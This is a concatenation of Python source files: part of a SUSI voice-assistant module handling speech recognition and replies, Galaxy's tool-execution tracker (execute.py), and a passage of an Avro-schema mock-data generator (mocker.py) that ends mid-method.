self.idle = False
# beep
player.beep(self.sound_detection)
if GPIO:
GPIO.output(22, True)
audio = None
logger.debug("notify renderer for listening")
self.notify_renderer('listening')
with self.microphone as source:
try:
logger.debug("listening to voice command")
audio = self.recognizer.listen(source, timeout=10.0, phrase_time_limit=5)
except sr.WaitTimeoutError:
logger.debug("timeout reached waiting for voice command")
self.deal_with_error('ListenTimeout')
logger.debug("delaying idle setting for 0.05s")
Timer(interval=0.05, function=self.set_idle).start()
return
if GPIO:
GPIO.output(22, False)
lights.off()
lights.think()
try:
logger.debug("Converting audio to text")
value = self.recognize_audio(audio=audio, recognizer=self.recognizer)
logger.debug("recognize_audio => %s", value)
self.notify_renderer('recognized', value)
if self.deal_with_answer(value):
pass
else:
logger.error("Error dealing with answer")
except sr.UnknownValueError as e:
logger.error("UnknownValueError from SpeechRecognition: %s", e)
self.deal_with_error('RecognitionError')
logger.debug("delaying idle setting for 0.05s")
Timer(interval=0.05, function=self.set_idle).start()
return
def set_idle(self):
logger.debug("Switching to idle mode")
self.notify_renderer('idle')
self.idle = True
def __speak(self, text):
"""Method to set the default TTS for the Speaker"""
tts = self.susi_config.get('tts')
if tts == 'google':
TTS.speak_google_tts(text)
elif tts == 'flite':
logger.info("Using flite for TTS") # indication for using an offline music player
TTS.speak_flite_tts(text)
elif tts == 'watson':
TTS.speak_watson_tts(text)
else:
raise ValueError("unknown key for tts", tts)
def recognize_audio(self, recognizer, audio):
"""Use the configured STT method to convert spoken audio to text"""
stt = self.susi_config.get('stt')
lang = self.susi_config.get('language')
# Try to adjust language to what is available
# None indicates any language supported, so use it as is
if self.supported_languages is not None:
if len(self.supported_languages) == 0:
raise ValueError(f"No supported language for the current STT {stt}")
if "en-US" in self.supported_languages:
default = "en-US"
else:
default = self.supported_languages[0]
if lang not in self.supported_languages:
if len(lang) < 2:
logger.warn(f"Unsupported language code {lang}, using {default}")
lang = default
else:
langshort = lang[0:2].lower()
for l in self.supported_languages:
if langshort == l[0:2].lower():
logger.debug(f"Using language code {l} instead of {lang}")
lang = l
break
# We should now have a proper language code in lang, if not, warn and reset
if lang not in self.supported_languages:
logger.warn(f"Unsupported langauge code {lang}, using {default}")
lang = default
logger.info("Trying to recognize audio with %s in language: %s", stt, lang)
if stt == 'google':
return recognizer.recognize_google(audio, language=lang)
elif stt == 'watson':
username = self.susi_config.get('watson.stt.user')
password = self.susi_config.get('watson.stt.pass')
return recognizer.recognize_ibm(
username=username, password=password, language=lang, audio_data=audio)
elif stt == 'pocketsphinx':
return recognizer.recognize_sphinx(audio, language=lang)
elif stt == 'bing':
api_key = self.susi_config.get('bing.api')
return recognizer.recognize_bing(audio_data=audio, key=api_key, language=lang)
elif stt == 'deepspeech-local':
return recognizer.recognize_deepspeech(audio, language=lang)
else:
logger.error(f"Unknown STT setting: {stt}")
logger.error("Using DeepSpeech!")
return recognizer.recognize_deepspeech(audio, language=lang)
def deal_with_error(self, payload=None):
"""deal with errors happening during processing of audio events"""
if payload == 'RecognitionError':
logger.debug("ErrorState Recognition Error")
self.notify_renderer('error', 'recognition')
lights.speak()
player.say(self.sound_error_recognition)
lights.off()
elif payload == 'ConnectionError':
self.notify_renderer('error', 'connection')
self.susi_config.set('tts', 'flite')
self.susi_config.set('stt', 'pocketsphinx')
print("Internet Connection not available")
lights.speak()
lights.off()
logger.info("Changed to offline providers")
elif payload == 'ListenTimeout':
self.notify_renderer('error', 'timeout')
lights.speak()
player.say(self.sound_error_timeout)
lights.off()
else:
print("Error: {} \n".format(payload))
self.notify_renderer('error')
lights.speak()
player.say(self.sound_problem)
lights.off()
def deal_with_answer(self, payload=None):
"""processing logic - how to deal with answers from the server"""
try:
no_answer_needed = False
if isinstance(payload, str):
logger.debug("Sending payload to susi server: %s", payload)
reply = self.susi.ask(payload)
else:
logger.debug("Executing planned action response: %s", payload)
reply = payload
if GPIO:
GPIO.output(27, True)
self.notify_renderer('speaking', payload={'susi_reply': reply})
if 'planned_actions' in reply.keys():
logger.debug("planning action: ")
for plan in reply['planned_actions']:
logger.debug("plan = " + str(plan))
# plan answers look like this:
# plan = {'planned_actions': [{'language': 'en', 'answer': 'ALARM', 'plan_delay': 300001,
# 'plan_date': '2020-01-09T02:05:10.377Z'}], 'language': 'en', 'answer': 'alarm set for in 5 minutes'}
# we use time.time as timefunc for scheduler, so we need to convert the
# delay and absolute time to the same format, that is float of sec since epoch
# Unfortunately, the standard library's datetime.fromisoformat does not
# parse the trailing 'Z' suffix
# (https://discuss.python.org/t/parse-z-timezone-suffix-in-datetime/2220),
# so we replace it manually with '+00:00' before parsing.
# We send both the delay and the absolute time in case one of the two is
# missing; the scheduler prefers the delay value.
plan_date_sec = datetime.fromisoformat(re.sub('Z$', '+00:00', plan['plan_date'])).timestamp()
self.action_scheduler.add_event(int(plan['plan_delay']) / 1000, plan_date_sec, plan)
# first responses WITHOUT answer key!
# {'answer': 'Audio volume is now 10 percent.', 'volume': '10'}
if 'volume' in reply.keys():
no_answer_needed = True
player.volume(reply['volume'])
player.say(self.sound_detection)
if 'media_action' in reply.keys():
action = reply['media_action']
if action == 'pause':
no_answer_needed = True
player.pause()
lights.off()
lights.wakeup()
elif action == 'resume':
no_answer_needed = True
player.resume()
elif action == 'restart':
no_answer_needed = True
player.restart()
elif action == 'next':
no_answer_needed = True
player.next()
elif action == 'previous':
no_answer_needed = True
player.previous()
elif action == 'shuffle':
no_answer_needed = True
player.shuffle()
else:
logger.error('Unknown media action: %s', action)
# {'stop': <susi_python.models.StopAction object at 0x7f4641598d30>}
if 'stop' in reply.keys():
no_answer_needed = True
player.stop()
if 'answer' in reply.keys():
logger.info('Susi: %s', reply['answer'])
lights.off()
lights.speak()
self.__speak(reply['answer'])
lights.off()
else:
if not no_answer_needed and 'identifier' not in reply.keys():
lights.off()
lights.speak()
self.__speak("I don't have an answer to this")
lights.off()
if 'language' in reply.keys():
answer_lang = reply['language']
if answer_lang != self.susi_config.get("language"):
logger.info("Switching language to: %s", answer_lang)
# switch language
self.susi_config.set('language', answer_lang)
# answer to "play ..."
# {'identifier': 'ytd-04854XqcfCY', 'answer': 'Playing Queen - We Are The Champions (Official Video)'}
if 'identifier' in reply.keys():
url = reply['identifier']
logger.debug("Playing " + url)
if url[:3] == 'ytd':
player.playytb(url[4:])
else:
player.play(url)
if 'table' in reply.keys():
table = reply['table']
for h in table.head:
print('%s\t' % h, end='')
self.__speak(h)
print()
for datum in table.data[0:4]:
for value in datum:
print('%s\t' % value, end='')
self.__speak(value)
print()
if 'rss' in reply.keys():
rss = reply['rss']
entities = rss['entities']
count = rss['count']
for entity in entities[0:count]:
logger.debug(entity.title)
self.__speak(entity.title)
except ConnectionError:
self.deal_with_error('ConnectionError')
return False
except Exception as e:
logger.error('Unknown error: %s', e)
return False
return True
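# --- Editor's note: a minimal, hedged sketch (standalone, outside the class
# above) of the plan-date handling used in deal_with_answer(): before Python
# 3.11, datetime.fromisoformat() rejects a trailing 'Z', so it is rewritten to
# '+00:00' before converting to seconds since the epoch. The plan dict is made up.
def demo_plan_date_to_epoch():
    import re
    from datetime import datetime
    plan = {'plan_date': '2020-01-09T02:05:10.377Z', 'plan_delay': 300001}
    iso = re.sub('Z$', '+00:00', plan['plan_date'])
    plan_date_sec = datetime.fromisoformat(iso).timestamp()
    delay_sec = int(plan['plan_delay']) / 1000
    return plan_date_sec, delay_sec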
|
execute.py
|
"""
Once state information has been calculated, handle actually executing tools
from various states, tracking results, and building implicit dataset
collections from matched collections.
"""
import collections
import logging
from threading import Thread
import six
import six.moves
from six.moves.queue import Queue
from galaxy import model
from galaxy.dataset_collections.structure import get_structure, tool_output_to_structure
from galaxy.tools.actions import filter_output, on_text_for_names, ToolExecutionCache
from galaxy.tools.parser import ToolOutputCollectionPart
from galaxy.util import ExecutionTimer
log = logging.getLogger(__name__)
EXECUTION_SUCCESS_MESSAGE = "Tool [%s] created job [%s] %s"
class PartialJobExecution(Exception):
def __init__(self, execution_tracker):
self.execution_tracker = execution_tracker
MappingParameters = collections.namedtuple("MappingParameters", ["param_template", "param_combinations"])
def execute(trans, tool, mapping_params, history, rerun_remap_job_id=None, collection_info=None, workflow_invocation_uuid=None, invocation_step=None, max_num_jobs=None, job_callback=None, completed_jobs=None, workflow_resource_parameters=None):
"""
Execute a tool and return object containing summary (output data, number of
failures, etc...).
"""
if max_num_jobs:
assert invocation_step is not None
if rerun_remap_job_id:
assert invocation_step is None
all_jobs_timer = ExecutionTimer()
if invocation_step is None:
execution_tracker = ToolExecutionTracker(trans, tool, mapping_params, collection_info)
else:
execution_tracker = WorkflowStepExecutionTracker(trans, tool, mapping_params, collection_info, invocation_step, job_callback=job_callback)
app = trans.app
execution_cache = ToolExecutionCache(trans)
def execute_single_job(execution_slice, completed_job):
job_timer = ExecutionTimer()
params = execution_slice.param_combination
if workflow_invocation_uuid:
params['__workflow_invocation_uuid__'] = workflow_invocation_uuid
elif '__workflow_invocation_uuid__' in params:
# Only workflow invocation code gets to set this, ignore user supplied
# values or rerun parameters.
del params['__workflow_invocation_uuid__']
if workflow_resource_parameters:
params['__workflow_resource_params__'] = workflow_resource_parameters
elif '__workflow_resource_params__' in params:
# Only workflow invocation code gets to set this, ignore user supplied
# values or rerun parameters.
del params['__workflow_resource_params__']
job, result = tool.handle_single_execution(trans, rerun_remap_job_id, execution_slice, history, execution_cache, completed_job)
if job:
message = EXECUTION_SUCCESS_MESSAGE % (tool.id, job.id, job_timer)
log.debug(message)
execution_tracker.record_success(execution_slice, job, result)
else:
execution_tracker.record_error(result)
tool_action = tool.tool_action
if hasattr(tool_action, "check_inputs_ready"):
for params in execution_tracker.param_combinations:
# This will throw an exception if the tool is not ready.
tool_action.check_inputs_ready(
tool,
trans,
params,
history
)
execution_tracker.ensure_implicit_collections_populated(history, mapping_params.param_template)
config = app.config
burst_at = getattr(config, 'tool_submission_burst_at', 10)
burst_threads = getattr(config, 'tool_submission_burst_threads', 1)
job_count = len(execution_tracker.param_combinations)
jobs_executed = 0
has_remaining_jobs = False
if (job_count < burst_at or burst_threads < 2):
for i, execution_slice in enumerate(execution_tracker.new_execution_slices()):
if max_num_jobs and jobs_executed >= max_num_jobs:
has_remaining_jobs = True
break
else:
execute_single_job(execution_slice, completed_jobs[i])
else:
# TODO: re-record success...
q = Queue()
def worker():
while True:
execution_slice, completed_job = q.get()
execute_single_job(execution_slice, completed_job)
q.task_done()
for i in range(burst_threads):
t = Thread(target=worker)
t.daemon = True
t.start()
for i, execution_slice in enumerate(execution_tracker.new_execution_slices()):
if max_num_jobs and jobs_executed >= max_num_jobs:
has_remaining_jobs = True
break
else:
q.put((execution_slice, completed_jobs[i]))
jobs_executed += 1
q.join()
if has_remaining_jobs:
raise PartialJobExecution(execution_tracker)
else:
execution_tracker.finalize_dataset_collections(trans)
log.debug("Executed %d job(s) for tool %s request: %s" % (job_count, tool.id, all_jobs_timer))
return execution_tracker
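# --- Editor's note: a minimal, hedged sketch (independent of Galaxy) of the
# bounded "burst" pattern used in execute() above: once the job count crosses a
# threshold, work items are pushed onto a Queue and drained by a small pool of
# daemon threads, and q.join() blocks until every item has been processed.
def demo_burst_workers(items, handle, burst_threads=4):
    from queue import Queue
    from threading import Thread
    q = Queue()

    def worker():
        while True:
            item = q.get()
            try:
                handle(item)
            finally:
                q.task_done()

    for _ in range(burst_threads):
        Thread(target=worker, daemon=True).start()
    for item in items:
        q.put(item)
    q.join()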
class ExecutionSlice(object):
def __init__(self, job_index, param_combination, dataset_collection_elements=None):
self.job_index = job_index
self.param_combination = param_combination
self.dataset_collection_elements = dataset_collection_elements
class ExecutionTracker(object):
def __init__(self, trans, tool, mapping_params, collection_info):
# Known ahead of time...
self.trans = trans
self.tool = tool
self.mapping_params = mapping_params
self.collection_info = collection_info
self._on_text = None
# Populated as we go...
self.failed_jobs = 0
self.execution_errors = []
self.successful_jobs = []
self.output_datasets = []
self.output_collections = []
self.implicit_collections = collections.OrderedDict()
@property
def param_combinations(self):
return self.mapping_params.param_combinations
@property
def example_params(self):
if self.mapping_params.param_combinations:
return self.mapping_params.param_combinations[0]
else:
# TODO: This isn't quite right - what we want is something like param_template wrapped,
# need a test case with an output filter applied to an empty list, still this is
# an improvement over not allowing mapping of empty lists.
return self.mapping_params.param_template
@property
def job_count(self):
return len(self.param_combinations)
def record_error(self, error):
self.failed_jobs += 1
message = "There was a failure executing a job for tool [%s] - %s"
log.warning(message, self.tool.id, error)
self.execution_errors.append(error)
@property
def on_text(self):
if self._on_text is None:
collection_names = ["collection %d" % c.hid for c in self.collection_info.collections.values()]
self._on_text = on_text_for_names(collection_names)
return self._on_text
def output_name(self, trans, history, params, output):
on_text = self.on_text
try:
output_collection_name = self.tool.tool_action.get_output_name(
output,
dataset=None,
tool=self.tool,
on_text=on_text,
trans=trans,
history=history,
params=params,
incoming=None,
job_params=None,
)
except Exception:
output_collection_name = "%s across %s" % (self.tool.name, on_text)
return output_collection_name
def sliced_input_collection_structure(self, input_name):
unqualified_recurse = self.tool.profile < 18.09 and "|" not in input_name
def find_collection(input_dict, input_name):
for key, value in input_dict.items():
if key == input_name:
return value
if isinstance(value, dict):
if "|" in input_name:
prefix, rest_input_name = input_name.split("|", 1)
if key == prefix:
return find_collection(value, rest_input_name)
elif unqualified_recurse:
# Looking for "input1" instead of "cond|input1" for instance.
# See discussion on https://github.com/galaxyproject/galaxy/issues/6157.
unqualified_match = find_collection(value, input_name)
if unqualified_match:
return unqualified_match
input_collection = find_collection(self.example_params, input_name)
if input_collection is None:
raise Exception("Failed to find referenced collection in inputs.")
if not hasattr(input_collection, "collection"):
raise Exception("Referenced input parameter is not a collection.")
collection_type_description = self.trans.app.dataset_collections_service.collection_type_descriptions.for_collection_type(input_collection.collection.collection_type)
subcollection_mapping_type = None
if self.is_implicit_input(input_name):
subcollection_mapping_type = self.collection_info.subcollection_mapping_type(input_name)
return get_structure(input_collection, collection_type_description, leaf_subcollection_type=subcollection_mapping_type)
def _structure_for_output(self, trans, tool_output):
structure = self.collection_info.structure
if hasattr(tool_output, "default_identifier_source"):
# Switch the structure for outputs if the output specified a default_identifier_source
collection_type_descriptions = trans.app.dataset_collections_service.collection_type_descriptions
source_collection = self.collection_info.collections.get(tool_output.default_identifier_source)
if source_collection:
collection_type_description = collection_type_descriptions.for_collection_type(source_collection.collection.collection_type)
_structure = structure.for_dataset_collection(source_collection.collection, collection_type_description=collection_type_description)
if structure.can_match(_structure):
structure = _structure
return structure
def _mapped_output_structure(self, trans, tool_output):
collections_manager = trans.app.dataset_collections_service
output_structure = tool_output_to_structure(self.sliced_input_collection_structure, tool_output, collections_manager)
# self.collection_info.structure - the mapping structure with default_identifier_source
# used to determine the identifiers to use.
mapping_structure = self._structure_for_output(trans, tool_output)
# Output structure may not be known, but input structure must be,
# otherwise this step of the workflow shouldn't have been scheduled
# or the tool should not have been executable on this input.
mapped_output_structure = mapping_structure.multiply(output_structure)
return mapped_output_structure
def ensure_implicit_collections_populated(self, history, params):
if not self.collection_info:
return
history = history or self.tool.get_default_history_by_trans(self.trans)
# params = param_combinations[0] if param_combinations else mapping_params.param_template
self.precreate_output_collections(history, params)
def precreate_output_collections(self, history, params):
# params is just one sample tool param execution with parallelized
# collection replaced with a specific dataset. Need to replace this
# with the collection and wrap everything up so we can evaluate the output
# label.
trans = self.trans
params.update(self.collection_info.collections) # Replace datasets with source collections for labelling outputs.
collection_instances = {}
implicit_inputs = self.implicit_inputs
implicit_collection_jobs = model.ImplicitCollectionJobs()
for output_name, output in self.tool.outputs.items():
if filter_output(output, self.example_params):
continue
output_collection_name = self.output_name(trans, history, params, output)
effective_structure = self._mapped_output_structure(trans, output)
collection_instance = trans.app.dataset_collections_service.precreate_dataset_collection_instance(
trans=trans,
parent=history,
name=output_collection_name,
structure=effective_structure,
implicit_inputs=implicit_inputs,
implicit_output_name=output_name,
)
collection_instance.implicit_collection_jobs = implicit_collection_jobs
collection_instances[output_name] = collection_instance
trans.sa_session.add(collection_instance)
# Needed to flush the association created just above with
# job.add_output_dataset_collection.
trans.sa_session.flush()
self.implicit_collections = collection_instances
@property
def implicit_collection_jobs(self):
# TODO: refactor to track this properly maybe?
if self.implicit_collections:
return six.next(six.itervalues(self.implicit_collections)).implicit_collection_jobs
else:
return None
def finalize_dataset_collections(self, trans):
# TODO: this probably needs to be reworked some, we should have the collection methods
# return a list of changed objects to add to the session and flush and we should only
# be finalizing collections to a depth of self.collection_info.structure. So for instance
# if you are mapping a list over a tool that dynamically generates lists - we won't actually
# know the structure of the inner list until after its job is complete.
if self.failed_jobs > 0:
for i, implicit_collection in enumerate(self.implicit_collections.values()):
if i == 0:
implicit_collection_jobs = implicit_collection.implicit_collection_jobs
implicit_collection_jobs.populated_state = "failed"
trans.sa_session.add(implicit_collection_jobs)
implicit_collection.collection.handle_population_failed("One or more jobs failed during dataset initialization.")
trans.sa_session.add(implicit_collection.collection)
else:
for i, implicit_collection in enumerate(self.implicit_collections.values()):
if i == 0:
implicit_collection_jobs = implicit_collection.implicit_collection_jobs
implicit_collection_jobs.populated_state = "ok"
trans.sa_session.add(implicit_collection_jobs)
implicit_collection.collection.finalize()
trans.sa_session.add(implicit_collection.collection)
trans.sa_session.flush()
@property
def implicit_inputs(self):
implicit_inputs = list(self.collection_info.collections.items())
return implicit_inputs
def is_implicit_input(self, input_name):
return input_name in self.collection_info.collections
def walk_implicit_collections(self):
return self.collection_info.structure.walk_collections(self.implicit_collections)
def new_execution_slices(self):
if self.collection_info is None:
for job_index, param_combination in enumerate(self.param_combinations):
yield ExecutionSlice(job_index, param_combination)
else:
for execution_slice in self.new_collection_execution_slices():
yield execution_slice
def record_success(self, execution_slice, job, outputs):
# TODO: successful_jobs need to be inserted in the correct place...
self.successful_jobs.append(job)
self.output_datasets.extend(outputs)
for job_output in job.output_dataset_collection_instances:
self.output_collections.append((job_output.name, job_output.dataset_collection_instance))
if self.implicit_collections:
implicit_collection_jobs = None
for output_name, collection_instance in self.implicit_collections.items():
job.add_output_dataset_collection(output_name, collection_instance)
if implicit_collection_jobs is None:
implicit_collection_jobs = collection_instance.implicit_collection_jobs
job_assoc = model.ImplicitCollectionJobsJobAssociation()
job_assoc.order_index = execution_slice.job_index
job_assoc.implicit_collection_jobs = implicit_collection_jobs
job_assoc.job_id = job.id
self.trans.sa_session.add(job_assoc)
# Separate these because workflows need to track that their jobs belong to the invocation
# in the database immediately so that they can be recovered.
class ToolExecutionTracker(ExecutionTracker):
def __init__(self, trans, tool, mapping_params, collection_info):
super(ToolExecutionTracker, self).__init__(trans, tool, mapping_params, collection_info)
        # Need to track these things for the tool output API response in the tool case;
        # in the workflow case we just write stuff to the database and forget about it.
self.outputs_by_output_name = collections.defaultdict(list)
def record_success(self, execution_slice, job, outputs):
super(ToolExecutionTracker, self).record_success(execution_slice, job, outputs)
for output_name, output_dataset in outputs:
if ToolOutputCollectionPart.is_named_collection_part_name(output_name):
# Skip known collection outputs, these will be covered by
# output collections.
continue
self.outputs_by_output_name[output_name].append(output_dataset)
for job_output in job.output_dataset_collections:
self.outputs_by_output_name[job_output.name].append(job_output.dataset_collection)
def new_collection_execution_slices(self):
for job_index, (param_combination, dataset_collection_elements) in enumerate(six.moves.zip(self.param_combinations, self.walk_implicit_collections())):
for dataset_collection_element in dataset_collection_elements.values():
assert dataset_collection_element.element_object is None
yield ExecutionSlice(job_index, param_combination, dataset_collection_elements)
class WorkflowStepExecutionTracker(ExecutionTracker):
def __init__(self, trans, tool, mapping_params, collection_info, invocation_step, job_callback):
super(WorkflowStepExecutionTracker, self).__init__(trans, tool, mapping_params, collection_info)
self.invocation_step = invocation_step
self.job_callback = job_callback
def record_success(self, execution_slice, job, outputs):
super(WorkflowStepExecutionTracker, self).record_success(execution_slice, job, outputs)
if self.collection_info:
self.invocation_step.implicit_collection_jobs = self.implicit_collection_jobs
else:
self.invocation_step.job = job
self.job_callback(job)
def new_collection_execution_slices(self):
for job_index, (param_combination, dataset_collection_elements) in enumerate(six.moves.zip(self.param_combinations, self.walk_implicit_collections())):
            # Two options here - check if the element has been populated or check if a
            # WorkflowInvocationStepJobAssociation exists. Not sure which is better, but
            # for now use the first option, so check the elements.
found_result = False
for dataset_collection_element in dataset_collection_elements.values():
if dataset_collection_element.element_object is not None:
found_result = True
break
if found_result:
continue
yield ExecutionSlice(job_index, param_combination, dataset_collection_elements)
def ensure_implicit_collections_populated(self, history, params):
if not self.collection_info:
return
history = history or self.tool.get_default_history_by_trans(self.trans)
if self.invocation_step.is_new:
self.precreate_output_collections(history, params)
else:
collections = {}
for output_assoc in self.invocation_step.output_dataset_collections:
implicit_collection = output_assoc.dataset_collection
assert hasattr(implicit_collection, "history_content_type") # make sure it is an HDCA and not a DC
collections[output_assoc.output_name] = output_assoc.dataset_collection
self.implicit_collections = collections
__all__ = ('execute', )
|
mocker.py
|
# Copyright (C) 2018 by eHealth Africa : http://www.eHealthAfrica.org
#
# See the NOTICE file distributed with this work for additional information
# regarding copyright ownership.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import collections
from collections import namedtuple
import json
import logging
from queue import Queue, Empty
import os
from random import randint, uniform, choice, sample
import signal
import string
from threading import Thread
from time import sleep
from uuid import uuid4
from aether.client import Client, AetherAPIException
log = logging.getLogger(__name__)
log.setLevel(logging.DEBUG)
class Generic(object):
'''
We keep our default mocking functions for each type here as generic
'''
@staticmethod
def boolean():
return choice([True, False])
@staticmethod
def float():
return uniform(.01, 1000.00)
@staticmethod
def int():
return randint(1, 99999)
@staticmethod
def null():
return None
@staticmethod
def string():
size = choice(range(3, 12))
return "".join(sample(string.ascii_lowercase, size))
@staticmethod
def uuid():
return str(uuid4())
@staticmethod
def geo_lat():
return uniform(0.00000000000, 60.00000000000)
@staticmethod
def geo_lng():
return uniform(0.00000000000, 180.00000000000)
class DataMocker(object):
'''
An extensible tool that consumes an Avro Schema and creates junk data that matches it.
Data generation methods can be overridden on a per type [text, int, etc] basis via:
override_type(type_name, fn)
Override methods can also be passed on a property name basis [lat, lon, name] via:
override_property(property_name, fn)
'''
def __init__(self, name, schema, parent):
self.MAX_ARRAY_SIZE = 4
self.QUEUE_WORKERS = 10
self.REUSE_COEFFICIENT = 0.85
self.name = name
self.raw_schema = schema
self.parent = parent
self.subschema = {}
self.primative_types = [
"null",
"boolean",
"int",
"long",
"float",
"double",
"bytes",
"string"
]
self.type_methods = {
primative: MockFn(self._default(primative))
for primative in self.primative_types
}
self.created = [] # ids of created entities
self.reuse = 0 # number of recycled entity ids
self.count = 0 # number of entity references to this type
self.property_methods = {}
self.required = []
self.ignored_properties = []
self.restricted_types = {}
self.instructions = {}
self.killed = False
self._queue = Queue()
self.__start_queue_process()
self.override_property("id", MockFn(Generic.uuid))
self.load()
def _default(self, primative):
if primative in ["int", "long"]:
return Generic.int
if primative in ["float", "double"]:
return Generic.float
        if primative == "null":
            return Generic.null
        if primative == "string":
            return Generic.string
        if primative == "boolean":
            return Generic.boolean
def kill(self):
self.killed = True
def __start_queue_process(self):
for x in range(self.QUEUE_WORKERS):
worker = Thread(target=self.__reference_runner, args=[])
worker.daemon = False
worker.start()
def __reference_runner(self):
while True:
if self.killed:
break
try:
fn = self._queue.get(block=True, timeout=1)
fn()
except Empty as emp:
if self.killed:
break
sleep(1)
except Exception as err:
raise err
def get_reference(self, exclude=None):
# called from other types to generate this one (lazily)
# returns an ID, either of by registering a new instance
# or by returning a value from created
self.count += 1
thresh = 0 if self.count <= 100 else (100 * self.REUSE_COEFFICIENT)
new = (randint(0, 100) >= thresh)
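        # i.e. once more than 100 references have been handed out, a new id is only
        # generated ~15% of the time; otherwise an existing id is reused below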
if new:
_id = self.quick_reference()
else:
items = self.created[:-4]
if items:
self.reuse += 1
_id = choice(items)
else:
_id = self.quick_reference()
return _id
def quick_reference(self):
# generates an id for this type
# queues a job to actually make the instance
_id = None
if self.property_methods.get('id'):
fn = self.property_methods.get('id')
_id = fn()
else:
            fn = [fn for name, fn in self.instructions.get(
                self.name) if name == 'id']
if not fn:
raise ValueError("Couldn't find id function")
_id = fn[0]()
        deferred_generation = MockFn(self.fullfill_reference, [_id])
        self._queue.put(deferred_generation)
return _id
def fullfill_reference(self, _id):
# the method called from the queue to create an instance
new_record = self.get(set_id=_id)
self.parent.register(self.name, new_record)
return _id
def get(self, record_type="default", set_id=None):
# Creates a mock instance of this type
# wraps _get
        if record_type == "default":
body = self._get(self.name)
if set_id:
body['id'] = set_id
self.created.append(body.get('id'))
return body
else:
return self._get(record_type)
def _get(self, name):
# actually compiles the instruction set for this type and returns the body
instructions = self.instructions.get(name)
if not instructions:
alt = self.parent.names.get(name)
instructions = self.instructions.get(alt)
if not instructions:
raise ValueError("No instructions for type %s" % name)
body = {}
for name, fn in instructions:
body[name] = fn()
return body
def gen(self, _type):
# generation of avro types
return self.type_methods.get(_type)
def gen_array(self, _type):
# generation of an array of any type
fn = self.gen(_type)
return MockFn(self._gen_array, [fn])
def _gen_array(self, fn):
size = choice(range(2, self.MAX_ARRAY_SIZE))
return [fn() for i in range(size)]
def gen_random_type(self, name=None, _types=None):
if _types is None:
_types = []
return MockFn(self._gen_random_type, [name, _types])
def _gen_random_type(self, name, types):
        # picks one of the valid types available for the field and completes it
if name in self.required:
types = [i for i in types if i != "null"]
_type = choice(types)
fn = None
if isinstance(_type, dict):
if _type.get("type", None) != "array":
raise ValueError("unexpected type, %s" % _type.get('type'))
items = _type.get("items")
fn = self.gen_array(items)
return fn()
elif isinstance(_type, list):
if name in self.required:
                _type = [i for i in types if i != "null"]
_type = choice(_type)
        if _type not in self.primative_types:
fn = self.gen_complex(_type)
else:
fn = self.gen(_type)
return fn()
def gen_complex(self, _type):
return MockFn(self._gen_complex, _type)
def _gen_complex(self, name):
# handles generation of associated types
try:
return self._get(name)
except ValueError as verr:
fn = self.gen("null")
return fn()
def gen_reference(self, name, _type, types):
# gets a reference to a foreign type
# usually triggers creation via the other types get_reference()
return MockFn(self._gen_reference, [name, _type, types])
def _gen_reference(self, name, _type, types):
if name in self.required:
types = [i for i in types if i != "null"]
chosen = choice(types)
if isinstance(chosen, str):
return self.parent.get_reference(_type)
else:
size = choice(range(2, self.MAX_ARRAY_SIZE))
return [self.get_reference(_type) for i in range(size)]
def ignore(self, property_name):
# turn off mocking for this property
self.ignored_properties.append(property_name)
def override_type(self, type_name, fn):
# provide an override method for an avro type
# fn is a MockFn object
self.type_methods[type_name] = fn
self.load()
def override_property(self, property_name, fn):
# overrides a property in this type by name with a new function
        # for example instead of returning a random string for the name field, pick from a list
# fn is a MockFn object
self.property_methods[property_name] = fn
self.load()
def load(self):
# loads schema definition for this type
self.schema = json.loads(self.raw_schema)
if isinstance(self.schema, list):
for obj in self.schema:
self.parse(obj)
else:
self.parse(self.schema)
def parse(self, schema):
# looks at all the types called for
# matches simple types to type_methods
# stubs external calls to parent for linked types
name = schema.get("name")
instructions = []
fields = schema.get("fields", [])
for field in fields:
instructions.append(self._comprehend_field(field))
self.instructions[name] = instructions
for i in self.instructions[name]:
log.debug("Add instruction to %s : %s" % (name, i))
def _comprehend_field(self, field):
# picks apart an avro definition of a field and builds mocking functions
name = field.get("name")
if name in self.ignored_properties:
return (name, self.gen("null")) # Return null function and get out
try:
ref_type = field.get("jsonldPredicate").get("_id")
types = field.get('type')
# This is a reference property # TODO THIS MIGHT WANT TO BE sub_type
return (name, self.gen_reference(name, ref_type, types))
except Exception as err:
pass # This is simpler than checking to see if this is a dictionary?
if name in self.property_methods.keys():
# We have an explicit method for this
return (name, self.property_methods.get(name))
types = field.get("type")
if isinstance(types, str):
return (name, self.gen(types)) # Single type for this field
if name in self.restricted_types.keys(): # we've limited the types we want to mock
types = list(set(types).union(
set(self.restricted_types.get(name))))
return tuple([name, self.gen_random_type(name, types)])
    def require(self, *properties):
        # Make these fields never resolve to null (if null is an option)
        self.required.extend(properties)
def restrict_type(self, property_name, allowable_types=None):
# some properties can be completed by multiple types of properties
# for example [null, int, string[]?].
# restrict_type allows you to chose a subset of the permitted types for mocking
if allowable_types is None:
allowable_types = []
self.restricted_types[property_name] = allowable_types
class MockFn(namedtuple("MockFn", ("fn", "args"))):
# Function wrapper class containing fn and args
def __new__(cls, fn, args=None):
this = super(MockFn, cls).__new__(cls, fn, args)
return this
def __call__(self):
if self.args and not isinstance(self.args, list):
return self.fn(self.args)
try: # This lets us get very duck-type-y with the passed functions
return self.fn(*self.args) if self.args else self.fn()
except TypeError as terr:
return self.fn(self.args)
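# MockFn is a tiny callable (fn, args) pair, e.g. (illustrative only):
#   MockFn(Generic.uuid)()        -> a fresh uuid string
#   MockFn(randint, [1, 6])()     -> randint(1, 6)
#   MockFn(str.upper, "abc")()    -> "ABC" (a single non-list arg is passed as-is)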
class MockingManager(object):
def __init__(self, kernel_url, user, pw):
# connects to Aether and gets available schemas.
# constructs a DataMocker for each type
self.client = Client(kernel_url, user, pw)
self.types = {}
self.alias = {}
self.names = {}
self.project_schema = {}
self.schema_id = {}
self.type_count = {}
signal.signal(signal.SIGTERM, self.kill)
signal.signal(signal.SIGINT, self.kill)
self.load()
def get(self, _type):
        if _type not in self.types:
msg = "No schema for type %s" % (_type)
log.error(msg)
raise KeyError(msg)
return self.types.get(_type).get()
def get_reference(self, _type):
        if _type not in self.types:
msg = "No schema for type %s" % (_type)
log.error(msg)
raise KeyError(msg)
return self.types.get(_type).get_reference()
def kill(self, *args, **kwargs):
